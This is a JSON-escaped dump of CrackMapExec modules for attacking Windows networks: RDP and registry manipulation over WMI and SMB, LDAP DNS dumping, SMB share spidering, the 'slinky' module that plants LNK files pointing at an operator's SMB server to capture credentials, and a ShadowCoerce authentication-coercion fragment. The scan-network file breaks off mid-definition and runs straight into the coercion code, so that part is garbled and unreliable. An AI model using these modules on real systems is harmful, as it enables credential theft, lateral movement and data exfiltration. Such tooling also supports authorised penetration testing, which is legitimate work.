iWbemServices.GetObject(\"StdRegProv\")\n out = StdRegProv.GetDWORDValue(2147483650, 'SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp', 'PortNumber')\n self.logger.success(f\"RDP Port: {str(out.uValue)}\")\n\n # Nt version under 6 not support RAM.\n def rdp_RAMWrapper(self, action):\n iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)\n self.__iWbemLevel1Login.RemRelease()\n StdRegProv, resp = iWbemServices.GetObject(\"StdRegProv\")\n if action == 'enable-ram':\n self.logger.info(\"Enabling Restricted Admin Mode.\")\n StdRegProv.SetDWORDValue(2147483650, 'System\\\\CurrentControlSet\\\\Control\\\\Lsa', 'DisableRestrictedAdmin', 0)\n elif action == 'disable-ram':\n self.logger.info(\"Disabling Restricted Admin Mode (Clear).\")\n StdRegProv.DeleteValue(2147483650, 'System\\\\CurrentControlSet\\\\Control\\\\Lsa', 'DisableRestrictedAdmin')\n out = StdRegProv.GetDWORDValue(2147483650, 'System\\\\CurrentControlSet\\\\Control\\\\Lsa', 'DisableRestrictedAdmin')\n if out.uValue == 0:\n self.logger.success(\"Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully\")\n elif out.uValue == None:\n self.logger.success(\"Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully\")" }, { "path": "cme/modules/reg-query.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\n\n\nclass CMEModule:\n name = \"reg-query\"\n description = \"Performs a registry query on the machine\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.delete = None\n self.type = None\n self.value = None\n self.key = None\n self.path = None\n\n def options(self, context, module_options):\n \"\"\"\n PATH Registry key path to query\n KEY Registry key value to retrieve\n VALUE Registry key value to set (only used for modification)\n Will add a new registry key if the registry key does not already exist\n TYPE Type of registry to modify, add or delete. Default type : REG_SZ.\n Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD\n DELETE If set to True, delete a registry key if it does exist\n \"\"\"\n self.context = context\n self.path = None\n self.key = None\n self.value = None\n self.type = None\n self.delete = False\n\n if module_options and \"PATH\" in module_options:\n self.path = module_options[\"PATH\"]\n\n if module_options and \"KEY\" in module_options:\n self.key = module_options[\"KEY\"]\n\n if \"VALUE\" in module_options:\n self.value = module_options[\"VALUE\"]\n if \"TYPE\" in module_options:\n type_dict = {\n \"REG_NONE\": rrp.REG_NONE,\n \"REG_SZ\": rrp.REG_SZ,\n \"REG_EXPAND_SZ\": rrp.REG_EXPAND_SZ,\n \"REG_BINARY\": rrp.REG_BINARY,\n \"REG_DWORD\": rrp.REG_DWORD,\n \"REG_DWORD_BIG_ENDIAN\": rrp.REG_DWORD_BIG_ENDIAN,\n \"REG_LINK\": rrp.REG_LINK,\n \"REG_MULTI_SZ\": rrp.REG_MULTI_SZ,\n \"REG_QWORD\": rrp.REG_QWORD,\n }\n self.type = module_options[\"TYPE\"]\n if \"WORD\" in self.type:\n try:\n self.value = int(self.value)\n except:\n context.log.fail(f\"Invalid registry value type specified: {self.value}\")\n return\n if self.type in type_dict:\n self.type = type_dict[self.type]\n else:\n context.log.fail(f\"Invalid registry value type specified: {self.type}\")\n return\n else:\n self.type = 1\n\n if module_options and \"DELETE\" in module_options and module_options[\"DELETE\"].lower() == \"true\":\n self.delete = True\n\n def on_admin_login(self, context, connection):\n self.context = context\n if not self.path:\n self.context.log.fail(\"Please provide the path of the registry to query\")\n return\n if not self.key:\n self.context.log.fail(\"Please provide the registry key to query\")\n return\n\n remote_ops = RemoteOperations(connection.conn, False)\n remote_ops.enableRegistry()\n\n try:\n if \"HKLM\" in self.path or \"HKEY_LOCAL_MACHINE\" in self.path:\n self.path = self.path.replace(\"HKLM\\\\\", \"\")\n ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)\n elif \"HKCU\" in self.path or \"HKEY_CURRENT_USER\" in self.path:\n self.path = self.path.replace(\"HKCU\\\\\", \"\")\n ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)\n elif \"HKCR\" in self.path or \"HKEY_CLASSES_ROOT\" in self.path:\n self.path = self.path.replace(\"HKCR\\\\\", \"\")\n ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)\n else:\n self.context.log.fail(f\"Unsupported registry hive specified in path: {self.path}\")\n return\n\n reg_handle = ans[\"phKey\"]\n ans = rrp.hBaseRegOpenKey(remote_ops._RemoteOperations__rrp, reg_handle, self.path)\n key_handle = ans[\"phkResult\"]\n\n if self.delete:\n # Delete registry\n try:\n # Check if value exists\n data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)\n except:\n self.context.log.fail(f\"Registry key {self.key} does not exist\")\n return\n # Delete value\n rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)\n self.context.log.success(f\"Registry key {self.key} has been deleted successfully\")\n rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)\n\n if self.value is not None:\n # Check if value exists\n try:\n # Check if value exists\n data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)\n self.context.log.highlight(f\"Key {self.key} exists with value {reg_value}\")\n # Modification\n rrp.hBaseRegSetValue(\n remote_ops._RemoteOperations__rrp,\n key_handle,\n self.key,\n self.type,\n self.value,\n )\n self.context.log.success(f\"Key {self.key} has been modified to {self.value}\")\n except:\n rrp.hBaseRegSetValue(\n remote_ops._RemoteOperations__rrp,\n key_handle,\n self.key,\n self.type,\n self.value,\n )\n self.context.log.success(f\"New Key {self.key} has been added with value {self.value}\")\n rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)\n else:\n # Query\n try:\n data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)\n self.context.log.highlight(f\"{self.key}: {reg_value}\")\n except:\n if self.delete:\n pass\n else:\n self.context.log.fail(f\"Registry key {self.key} does not exist\")\n return\n rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)\n except DCERPCException as e:\n self.context.log.fail(f\"DCERPC Error while querying or modifying registry: {e}\")\n except Exception as e:\n self.context.log.fail(f\"Error while querying or modifying registry: {e}\")\n finally:\n remote_ops.finish()\n" }, { "path": "cme/modules/runasppl.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n name = \"runasppl\"\n description = \"Check if the registry value RunAsPPL is set or not\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n\n def options(self, context, module_options):\n \"\"\"\"\"\"\n\n def on_admin_login(self, context, connection):\n command = \"reg query HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ /v RunAsPPL\"\n context.log.display(\"Executing command\")\n p = connection.execute(command, True)\n if \"The system was unable to find the specified registry key or value\" in p:\n context.log.debug(f\"Unable to find RunAsPPL Registry Key\")\n else:\n context.log.highlight(p)\n" }, { "path": "cme/modules/scan-network.py", "content": "# Credit to https://twitter.com/snovvcrash/status/1550518555438891009\n# Credit to https://github.com/dirkjanm/adidnsdump @_dirkjan\n# module by @mpgn_x64\n\nfrom os.path import expanduser\nimport codecs\nimport socket\nfrom builtins import str\nfrom datetime import datetime\nfrom struct import unpack\n\nimport dns.name\nimport dns.resolver\nfrom impacket.structure import Structure\nfrom ldap3 import LEVEL\n\n\ndef get_dns_zones(connection, root, debug=False):\n connection.search(root, \"(objectClass=dnsZone)\", search_scope=LEVEL, attributes=[\"dc\"])\n zones = []\n for entry in connection.response:\n if entry[\"type\"] != \"searchResEntry\":\n continue\n zones.append(entry[\"attributes\"][\"dc\"])\n return zones\n\n\ndef get_dns_resolver(server, context):\n # Create a resolver object\n dnsresolver = dns.resolver.Resolver()\n # Is our host an IP? In that case make sure the server IP is used\n # if not assume lookups are working already\n try:\n if server.startswith(\"ldap://\"):\n server = server[7:]\n if server.startswith(\"ldaps://\"):\n server = server[8:]\n socket.inet_aton(server)\n dnsresolver.nameservers = [server]\n except socket.error:\n context.info(\"Using System DNS to resolve unknown entries. Make sure resolving your\" \" target domain works here or specify an IP as target host to use that\" \" server for queries\")\n return dnsresolver\n\n\ndef ldap2domain(ldap):\n return re.sub(\",DC=\", \".\", ldap[ldap.lower().find(\"dc=\") :], flags=re.I)[3:]\n\n\ndef new_record(rtype, serial):\n nr = DNS_RECORD()\n nr[\"Type\"] = rtype\n nr[\"Serial\"] = serial\n nr[\"TtlSeconds\"] = 180\n # From authoritive zone\n nr[\"Rank\"] = 240\n return nr\n\n\n# From: https://docs.microsoft.com/en-us/windows/win32/dns/dns-constants\nRECORD_TYPE_MAPPING = {\n 0: \"ZERO\",\n 1: \"A\",\n 2: \"NS\",\n 5: \"CNAME\",\n 6: \"SOA\",\n 12: \"PTR\",\n # 15: 'MX',\n # 16: 'TXT',\n 28: \"AAAA\",\n 33: \"SRV\",\n}\n\n\ndef searchResEntry_to_dict(results):\n data = {}\n for attr in results[\"attributes\"]:\n key = str(attr[\"type\"])\n value = str(attr[\"vals\"][0])\n data[key] = value\n return data\n\n\nclass CMEModule:\n name = \"get-network\"\n description = \"\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n ALL Get DNS and IP (default: false)\n ONLY_HOSTS Get DNS only (no ip) (default: false)\n \"\"\"\n\n self.showall = False\n self.showhosts = False\n self.showip = True\n\n if module_options and \"ALL\" in module_options:\n if module_options[\"ALL\"].lower() == \"true\" or module_options[\"ALL\"] == \"1\":\n self.showall = True\n else:\n print(\"Could not parse ALL option.\")\n if module_options and \"IP\" in module_options:\n if module_options[\"IP\"].lower() == \"true\" or module_options[\"IP\"] == \"1\":\n self.showip = True\n else:\n print(\"Could not parse ONLY_HOSTS option.\")\n if module_options and \"ONLY_HOSTS\" in module_options:\n if module_options[\"ONLY_HOSTS\"].lower() == \"true\" or module_options[\"ONLY_HOSTS\"] == \"1\":\n self.showhosts = True\n else:\n print(\"Could not parse ONLY_HOSTS option.\")\n\n def on_login(self, context, connection):\n zone = ldap2domain(connection.baseDN)\n dnsroot = \"CN=MicrosoftDNS,DC=DomainDnsZones,%s\" % connection.baseDN\n searchtarget = \"DC=%s,%s\" % (zone, dnsroot)\n context.log.display(\"Querying zone for records\")\n sfilter = \"(DC=*)\"\n\n try:\n list_sites = connection.ldapConnection.search(\n searchBase=searchtarget,\n searchFilter=sfilter,\n attributes=[\"dnsRecord\", \"dNSTombstoned\", \"name\"],\n sizeLimit=100000,\n )\n except ldap.LDAPSearchError as e:\n if e.getErrorString().find(\"sizeLimitExceeded\") >= 0:\n context.log.debug(\"sizeLimitExceeded exception caught, giving up and processing the\" \" data received\")\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n list_sites = e.getAnswers()\n pass\n else:\n raise\n targetentry = None\n dnsresolver = get_dns_resolver(connection.host, context.log)\n\n outdata = []\n\n for item in list_sites:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n site = searchResEntry_to_dict(item)\n recordname = site[\"name\"]\n\n if \"dnsRecord\" in site:\n record = bytes(site[\"dnsRecord\"].encode(\"latin1\"))\n dr = DNS_RECORD(record)\n if RECORD_TYPE_MAPPING[dr[\"Type\"]] == \"A\":\n if dr[\"Type\"] == 1:\n address = DNS_RPC_RECORD_A(dr[\"Data\"])\n if str(recordname) != \"DomainDnsZones\" and str(recordname) != \"ForestDnsZones\":\n outdata.append(\n {\n \"name\": recordname,\n \"type\": RECORD_TYPE_MAPPING[dr[\"Type\"]],\n \"value\": address.formatCanonical(),\n }\n )\n if dr[\"Type\"] in [a for a in RECORD_TYPE_MAPPING if RECORD_TYPE_MAPPING[a] in [\"CNAME\", \"NS\", \"PTR\"]]:\n address = DNS_RPC_RECORD_NODE_NAME(dr[\"Data\"])\n if str(recordname) != \"DomainDnsZones\" and str(recordname) != \"ForestDnsZones\":\n outdata.append(\n {\n \"name\": recordname,\n \"type\": RECORD_TYPE_MAPPING[dr[\"Type\"]],\n \"value\": address[list(address.fields)[0]].toFqdn(),\n }\n )\n elif dr[\"Type\"] == 28:\n address = DNS_RPC_RECORD_AAAA(dr[\"Data\"])\n if str(recordname) != \"DomainDnsZones\" and str(recordname) != \"ForestDnsZones\":\n outdata.append(\n {\n \"name\": recordname,\n \"type\": RECORD_TYPE_MAPPING[dr[\"Type\"]],\n \"value\": address.formatCanonical(),\n }\n )\n\n context.log.highlight(\"Found %d records\" % len(outdata))\n path = expanduser(\"~/.cme/logs/{}_network_{}.log\".format(connection.domain, datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")))\n with codecs.open(path, \"w\", \"utf-8\") as outfile:\n for row in outdata:\n if self.showhosts:\n outfile.write(\"{}\\n\".format(row[\"name\"] + \".\" + connection.domain))\n elif self.showall:\n outfile.write(\"{} \\t {}\\n\".format(row[\"name\"] + \".\" + connection.domain, row[\"value\"]))\n else:\n outfile.write(\"{}\\n\".format(row[\"value\"]))\n context.log.success(\"Dumped {} records to {}\".format(len(outdata), path))\n if not self.showall and not self.showhosts:\n context.log.display(\"To extract CIDR from the {} ip, run the following command: cat\" \" your_file | mapcidr -aa -silent | mapcidr -a -silent\".format(len(outdata)))\n\n\nclass DNS_RECORD(Structure):\n \"\"\"\n dnsRecord - used in LDAP\n [MS-DNSP] section 2.3.2.2\n \"\"\"\n\n structure = (\n (\"DataLength\", \"L\"),\n (\"Reserved\", \"H\"),\n (\"wRecordCount\", \">H\"),\n (\"dwFlags\", \">L\"),\n (\"dwChildCount\", \">L\"),\n (\"dnsNodeName\", \":\"),\n )\n\n\nclass DNS_RPC_RECORD_A(Structure):\n \"\"\"\n DNS_RPC_RECORD_A\n [MS-DNSP] section 2.2.2.2.4.1\n \"\"\"\n\n structure = ((\"address\", \":\"),)\n\n def formatCanonical(self):\n return socket.inet_ntoa(self[\"address\"])\n\n def fromCanonical(self, canonical):\n self[\"address\"] = socket.inet_aton(canonical)\n\n\nclass DNS_RPC_RECORD_NODE_NAME(Structure):\n \"\"\"\n DNS_RPC_RECORD_NODE_NAME\n [MS-DNSP] section 2.2.2.2.4.2\n \"\"\"\n\n structure = ((\"nameNode\", \":\", DNS_COUNT_NAME),)\n\n\nclass DNS_RPC_RECORD_SOA(Structure):\n \"\"\"\n DNS_RPC_RECORD_SOA\n [MS-DNSP] section 2.2.2.2.4.3\n \"\"\"\n\n structure = (\n (\"dwSerialNo\", \">L\"),\n (\"dwRefresh\", \">L\"),\n (\"dwRetry\", \">L\"),\n (\"dwExpire\", \">L\"),\n (\"dwMinimumTtl\", \">L\"),\n (\"namePrimaryServer\", \":\", DNS_COUNT_NAME),\n (\"zoneAdminEmail\", \":\", DNS_COUNT_NAME),\n )\n\n\nclass DNS_RPC_RECORD_NULL(Structure):\n \"\"\"\n DNS_RPC_RECORD_NULL\n [MS-DNSP] section 2.2.2.2.4.4\n \"\"\"\n\n structure = ((\"bData\", \":\"),)\n\n\n# Some missing structures here that I skipped\n\n\nclass DNS_RPC_RECORD_NAME_PREFERENCE(Structure):\n \"\"\"\n DNS_RPC_RECORD_NAME_PREFERENCE\n [MS-DNSP] section 2.2.2.2.4.8\n \"\"\"\n\n structure = ((\"wPreference\", \">H\"), (\"nameExchange\", \":\", DNS_COUNT_NAME))\n\n\n# Some missing structures here that I skipped\n\n\nclass DNS_RPC_RECORD_AAAA(Structure):\n \"\"\"\n DNS_RPC_RECORD_AAAA\n [MS-DNSP] section 2.2.2.2.4.17\n \"\"\"\n\n structure = ((\"ipv6Address\", \"16s\"),)\n\n def formatCanonical(self):\n return socket.inet_ntop(socket.AF_INET6, self[\"ipv6Address\"])\n\n\nclass DNS_RPC_RECORD_SRV(Structure):\n \"\"\"\n DNS_RPC_RECORD_SRV\n [MS-DNSP] section 2.2.2.2.4.18\n \"\"\"\n\n structure = (\n (\"wPriority\", \">H\"),\n (\"wWeight\", \">H\"),\n (\"wPort\", \">H\"),\n (\"nameTarget\", \":\", DNS_COUNT_NAME),\n )\n\n\nclass DNS_RPC_RECORD_TS(Structure):\n \"\"\"\n DNS_RPC_RECORD_TS\n [MS-DNSP] section 2.2.2.2.4.23\n \"\"\"\n\n structure = ((\"entombedTime\", \"= 0:\n dce.disconnect()\n return 1\n\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n\n cme_logger.info(\"Connected!\")\n cme_logger.info(\"Binding to %s\" % binding_params[pipe][\"UUID\"][0])\n try:\n dce.bind(uuidtup_to_bin(binding_params[pipe][\"UUID\"]))\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\" % str(e))\n\n cme_logger.info(\"Successfully bound!\")\n return dce\n\n def IsPathShadowCopied(self, dce, listener):\n cme_logger.debug(\"Sending IsPathShadowCopied!\")\n try:\n request = IsPathShadowCopied()\n # only NETLOGON and SYSVOL were detected working here\n # setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)\n request[\"ShareName\"] = \"\\\\\\\\%s\\\\NETLOGON\\x00\" % listener\n # request.dump()\n dce.request(request)\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\", str(e))\n cme_logger.debug(\"Attack may of may not have worked, check your listener...\")\n return False\n\n return True\n\n def IsPathSupported(self, dce, listener):\n cme_logger.debug(\"Sending IsPathSupported!\")\n try:\n request = IsPathSupported()\n # only NETLOGON and SYSVOL were detected working here\n # setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)\n request[\"ShareName\"] = \"\\\\\\\\%s\\\\NETLOGON\\x00\" % listener\n dce.request(request)\n except Exception as e:\n cme_logger.debug(\"Something went wrong, check error status => %s\", str(e))\n cme_logger.debug(\"Attack may of may not have worked, check your listener...\")\n return False\n\n return True\n" }, { "path": "cme/modules/slinky.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pylnk3\nimport ntpath\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Original idea and PoC by Justin Angel (@4rch4ngel86)\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"slinky\"\n description = \"Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions\"\n supported_protocols = [\"smb\"]\n opsec_safe = False\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.server = None\n self.file_path = None\n self.lnk_path = None\n self.lnk_name = None\n self.cleanup = None\n\n def options(self, context, module_options):\n \"\"\"\n SERVER IP of the SMB server\n NAME LNK file name\n CLEANUP Cleanup (choices: True or False)\n \"\"\"\n\n self.cleanup = False\n\n if \"CLEANUP\" in module_options:\n self.cleanup = bool(module_options[\"CLEANUP\"])\n\n if \"NAME\" not in module_options:\n context.log.fail(\"NAME option is required!\")\n exit(1)\n\n if not self.cleanup and \"SERVER\" not in module_options:\n context.log.fail(\"SERVER option is required!\")\n exit(1)\n\n self.lnk_name = module_options[\"NAME\"]\n self.lnk_path = f\"/tmp/{self.lnk_name}.lnk\"\n self.file_path = ntpath.join(\"\\\\\", f\"{self.lnk_name}.lnk\")\n\n if not self.cleanup:\n self.server = module_options[\"SERVER\"]\n link = pylnk3.create(self.lnk_path)\n link.icon = f\"\\\\\\\\{self.server}\\\\icons\\\\icon.ico\"\n link.save()\n\n def on_login(self, context, connection):\n shares = connection.shares()\n for share in shares:\n if \"WRITE\" in share[\"access\"] and share[\"name\"] not in [\n \"C$\",\n \"ADMIN$\",\n \"NETLOGON\",\n ]:\n context.log.success(f\"Found writable share: {share['name']}\")\n if not self.cleanup:\n with open(self.lnk_path, \"rb\") as lnk:\n try:\n connection.conn.putFile(share[\"name\"], self.file_path, lnk.read)\n context.log.success(f\"Created LNK file on the {share['name']} share\")\n except Exception as e:\n context.log.fail(f\"Error writing LNK file to share {share['name']}: {e}\")\n else:\n try:\n connection.conn.deleteFile(share[\"name\"], self.file_path)\n context.log.success(f\"Deleted LNK file on the {share['name']} share\")\n except Exception as e:\n context.log.fail(f\"Error deleting LNK file on share {share['name']}: {e}\")\n" }, { "path": "cme/modules/spider_plus.py", "content": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport errno\r\nimport os\r\nimport time\r\nimport traceback\r\nfrom cme.protocols.smb.remotefile import RemoteFile\r\nfrom impacket.smb3structs import FILE_READ_DATA\r\nfrom impacket.smbconnection import SessionError\r\n\r\n\r\nCHUNK_SIZE = 4096\r\n\r\n\r\ndef human_size(nbytes):\r\n \"\"\"\r\n This function takes a number of bytes as input and converts it to a human-readable\r\n size representation with appropriate units (e.g., KB, MB, GB, TB).\r\n \"\"\"\r\n suffixes = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"]\r\n\r\n # Find the appropriate unit suffix and convert bytes to higher units\r\n for i in range(len(suffixes)):\r\n if nbytes < 1024 or i == len(suffixes) - 1:\r\n break\r\n nbytes /= 1024.0\r\n\r\n # Format the number of bytes with two decimal places and remove trailing zeros and decimal point\r\n size_str = f\"{nbytes:.2f}\".rstrip(\"0\").rstrip(\".\")\r\n\r\n # Return the human-readable size with the appropriate unit suffix\r\n return f\"{size_str} {suffixes[i]}\"\r\n\r\n\r\ndef human_time(timestamp):\r\n \"\"\"This function takes a numerical timestamp (seconds since the epoch) and formats it\r\n as a human-readable date and time in the format \"YYYY-MM-DD HH:MM:SS\".\r\n \"\"\"\r\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(timestamp))\r\n\r\n\r\ndef make_dirs(path):\r\n \"\"\"\r\n This function attempts to create directories at the given path. It handles the\r\n exception `os.errno.EEXIST` that may occur if the directories already exist.\r\n \"\"\"\r\n try:\r\n os.makedirs(path)\r\n except OSError as e:\r\n if e.errno != errno.EEXIST:\r\n raise\r\n pass\r\n\r\n\r\ndef get_list_from_option(opt):\r\n \"\"\"\r\n This function takes a comma-separated string and converts it to a list of lowercase strings.\r\n It filters out empty strings from the input before converting.\r\n \"\"\"\r\n return list(map(lambda o: o.lower(), filter(bool, opt.split(\",\"))))\r\n\r\n\r\nclass SMBSpiderPlus:\r\n def __init__(\r\n self,\r\n smb,\r\n logger,\r\n download_flag,\r\n stats_flag,\r\n exclude_exts,\r\n exclude_filter,\r\n max_file_size,\r\n output_folder,\r\n ):\r\n self.smb = smb\r\n self.host = self.smb.conn.getRemoteHost()\r\n self.max_connection_attempts = 5\r\n self.logger = logger\r\n self.results = {}\r\n self.stats = {\r\n \"shares\": list(),\r\n \"shares_readable\": list(),\r\n \"shares_writable\": list(),\r\n \"num_shares_filtered\": 0,\r\n \"num_folders\": 0,\r\n \"num_folders_filtered\": 0,\r\n \"num_files\": 0,\r\n \"file_sizes\": list(),\r\n \"file_exts\": set(),\r\n \"num_get_success\": 0,\r\n \"num_get_fail\": 0,\r\n \"num_files_filtered\": 0,\r\n \"num_files_unmodified\": 0,\r\n \"num_files_updated\": 0,\r\n }\r\n self.download_flag = download_flag\r\n self.stats_flag = stats_flag\r\n self.exclude_filter = exclude_filter\r\n self.exclude_exts = exclude_exts\r\n self.max_file_size = max_file_size\r\n self.output_folder = output_folder\r\n\r\n # Make sure the output_folder exists\r\n make_dirs(self.output_folder)\r\n\r\n def reconnect(self):\r\n \"\"\"This function performs a series of reconnection attempts, up to `self.max_connection_attempts`,\r\n with a 3-second delay between each attempt. It renegotiates the session by creating a new\r\n connection object and logging in again.\r\n \"\"\"\r\n for i in range(1, self.max_connection_attempts + 1):\r\n self.logger.display(f\"Reconnection attempt #{i}/{self.max_connection_attempts} to server.\")\r\n\r\n # Renegotiate the session\r\n time.sleep(3)\r\n self.smb.create_conn_obj()\r\n self.smb.login()\r\n return True\r\n\r\n return False\r\n\r\n def list_path(self, share, subfolder):\r\n \"\"\"This function returns a list of paths for a given share/folder.\"\"\"\r\n filelist = []\r\n try:\r\n # Get file list for the current folder\r\n filelist = self.smb.conn.listPath(share, subfolder + \"*\")\r\n\r\n except SessionError as e:\r\n self.logger.debug(f'Failed listing files on share \"{share}\" in folder \"{subfolder}\".')\r\n self.logger.debug(str(e))\r\n\r\n if \"STATUS_ACCESS_DENIED\" in str(e):\r\n self.logger.debug(f'Cannot list files in folder \"{subfolder}\".')\r\n\r\n elif \"STATUS_OBJECT_PATH_NOT_FOUND\" in str(e):\r\n self.logger.debug(f\"The folder {subfolder} does not exist.\")\r\n\r\n elif self.reconnect():\r\n filelist = self.list_path(share, subfolder)\r\n\r\n return filelist\r\n\r\n def get_remote_file(self, share, path):\r\n \"\"\"This function will check if a path is readable in a SMB share.\"\"\"\r\n try:\r\n remote_file = RemoteFile(self.smb.conn, path, share, access=FILE_READ_DATA)\r\n return remote_file\r\n except SessionError:\r\n if self.reconnect():\r\n return self.get_remote_file(share, path)\r\n\r\n return None\r\n\r\n def read_chunk(self, remote_file, chunk_size=CHUNK_SIZE):\r\n \"\"\"This function reads the next chunk of data from the provided remote file using\r\n the specified chunk size. If a `SessionError` is encountered,\r\n it retries up to 3 times by reconnecting the SMB connection. If the maximum number\r\n of retries is exhausted or an unexpected exception occurs, it returns an empty chunk.\r\n \"\"\"\r\n\r\n chunk = \"\"\r\n retry = 3\r\n\r\n while retry > 0:\r\n retry -= 1\r\n try:\r\n chunk = remote_file.read(chunk_size)\r\n break\r\n\r\n except SessionError:\r\n if self.reconnect():\r\n # Little hack to reset the smb connection instance\r\n remote_file.__smbConnection = self.smb.conn\r\n return self.read_chunk(remote_file)\r\n\r\n except Exception:\r\n traceback.print_exc()\r\n break\r\n\r\n return chunk\r\n\r\n def get_file_save_path(self, remote_file):\r\n \"\"\"This function processes the remote file path to extract the filename and the folder\r\n path where the file should be saved locally. It converts forward slashes (/) and backslashes (\\)\r\n in the remote file path to the appropriate path separator for the local file system.\r\n The folder path and filename are then obtained separately.\r\n \"\"\"\r\n\r\n # Remove the backslash before the remote host part and replace slashes with the appropriate path separator\r\n remote_file_path = str(remote_file)[2:].replace(\"/\", os.path.sep).replace(\"\\\\\", os.path.sep)\r\n\r\n # Split the path to obtain the folder path and the filename\r\n folder, filename = os.path.split(remote_file_path)\r\n\r\n # Join the output folder with the folder path to get the final local folder path\r\n folder = os.path.join(self.output_folder, folder)\r\n\r\n return folder, filename\r\n\r\n def spider_shares(self):\r\n \"\"\"This function enumerates all available shares for the SMB connection, spiders\r\n through the readable shares, and saves the metadata of the shares to a JSON file.\r\n \"\"\"\r\n self.logger.info(\"Enumerating shares for spidering.\")\r\n shares = self.smb.shares()\r\n\r\n try:\r\n # Get all available shares for the SMB connection\r\n for share in shares:\r\n share_perms = share[\"access\"]\r\n share_name = share[\"name\"]\r\n self.stats[\"shares\"].append(share_name)\r\n\r\n self.logger.info(f'Share \"{share_name}\" has perms {share_perms}')\r\n if \"WRITE\" in share_perms:\r\n self.stats[\"shares_writable\"].append(share_name)\r\n if \"READ\" in share_perms:\r\n self.stats[\"shares_readable\"].append(share_name)\r\n else:\r\n # We only want to spider readable shares\r\n self.logger.debug(f'Share \"{share_name}\" not readable.')\r\n continue\r\n\r\n # `exclude_filter` is applied to the shares name\r\n if share_name.lower() in self.exclude_filter:\r\n self.logger.info(f'Share \"{share_name}\" has been excluded.')\r\n self.stats[\"num_shares_filtered\"] += 1\r\n continue\r\n\r\n try:\r\n # Start the spider at the root of the share folder\r\n self.results[share_name] = {}\r\n self.spider_folder(share_name, \"\")\r\n except SessionError:\r\n traceback.print_exc()\r\n self.logger.fail(f\"Got a session error while spidering.\")\r\n self.reconnect()\r\n\r\n except Exception as e:\r\n traceback.print_exc()\r\n self.logger.fail(f\"Error enumerating shares: {str(e)}\")\r\n\r\n # Save the metadata.\r\n self.dump_folder_metadata(self.results)\r\n\r\n # Print stats.\r\n if self.stats_flag:\r\n self.print_stats()\r\n\r\n return self.results\r\n\r\n def spider_folder(self, share_name, folder):\r\n \"\"\"This recursive function traverses through the contents of the specified share and folder.\r\n It checks each entry (file or folder) against various filters, performs file metadata recording,\r\n and downloads eligible files if the download flag is set.\r\n \"\"\"\r\n self.logger.info(f'Spider share \"{share_name}\" in folder \"{folder}\".')\r\n\r\n filelist = self.list_path(share_name, folder + \"*\")\r\n\r\n # For each entry:\r\n # - It's a folder then we spider it (skipping `.` and `..`)\r\n # - It's a file then we apply the checks\r\n for result in filelist:\r\n next_filedir = result.get_longname()\r\n if next_filedir in [\".\", \"..\"]:\r\n continue\r\n next_fullpath = folder + next_filedir\r\n result_type = \"folder\" if result.is_directory() else \"file\"\r\n self.stats[f\"num_{result_type}s\"] += 1\r\n\r\n # Check file-dir exclusion filter.\r\n if any(d in next_filedir.lower() for d in self.exclude_filter):\r\n self.logger.info(f'The {result_type} \"{next_filedir}\" has been excluded')\r\n self.stats[f\"{result_type}s_filtered\"] += 1\r\n continue\r\n\r\n if result_type == \"folder\":\r\n self.logger.info(f'Current folder in share \"{share_name}\": \"{next_fullpath}\"')\r\n self.spider_folder(share_name, next_fullpath + \"/\")\r\n else:\r\n self.logger.info(f'Current 